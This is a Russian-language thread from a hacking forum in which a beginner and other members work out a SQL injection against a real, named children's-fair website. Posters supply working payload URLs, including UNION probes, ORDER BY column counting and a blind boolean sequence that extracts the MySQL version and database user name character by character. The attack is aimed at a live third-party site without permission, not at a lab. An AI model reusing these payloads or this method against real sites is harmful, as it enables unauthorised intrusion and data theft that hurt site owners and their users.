Форум АНТИЧАТ - странный SQL-injection

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - странный SQL-injection (https://forum.antichat.xyz/showthread.php?t=36093)

странный SQL-injection

Вообщем так, нашёл на сайте вроде бы явную sql-injection
при вставке кавычки возвращает
http://www.injection.com/?dept=62&pid=665'

You have an error in your SQL syntax near '\'' at line 1

Вставляю
http://www.injection.com/?dept=62&pid=-999+union+select+1/*
А отображается
You have an error in your SQL syntax near 'union select 1/*' at line 1

При проверке
http://www.injection.com/?dept=62&pid=666-1
Выдаёт страницу http://www.injection.com/?dept=62&pid=665
Что бы я не вводил, выводится запрос в тексте после +union
Что такое - не получается
Я только учусь и надёюсь на ваш ценный совет!

Полный линк на сайт в студию...

Цитата:

Сообщение от ice1k

Полный линк на сайт в студию...

Пожалуйста! :)
http://www.mykidsfair.com/?dept=62&pi=665

ну тогда правильный линк
http://www.mykidsfair.com/?dept=62&pid=665

;)

вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx

Цитата:

Сообщение от aka PSIH

вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx

Круто! А я и не заметил, тогда сейчас попробую подобрать название колонки :)

А что можно поиметь вот с этого сообщения

http://www.mykidsfair.com/?dept=-999+union+select+1,2/*

You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ? :)

http://www.mykidsfair.com/?dept=62+order+by+13--

на сайте стоит 3 версия мускула, это мы узнаем по 1 цифре след запроса
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(version (),1,1)))=51

а потом вытягиваем USER()
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 1,1)))=99
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 2,1)))=106
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 3,1)))=104
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 4,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 5,1)))=114
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 6,1)))=109
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 7,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 8,1)))=110
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 9,1)))=64
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(), 10,1)))=108

в итоге получаем char() кодировку имени юзера
99, 106, 104, 97, 114, 109, 97, 110, 64, 108(остановился на 108, так как по практике могу сказать что там идет localhost)

ps мазахисты могут еще повытягивать......

Цитата:

А что можно поиметь вот с этого сообщения

http://www.mykidsfair.com/?dept=-999+union+select+1,2/*

You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ?

в 3-м мускуле нету оператора union

Спасибо огромное всем!!! Просто я хакинг начал изучать только в начале декабре 2006 :)

а толку от этой скули?
можно узнать тока версию, юзера и название базы данных.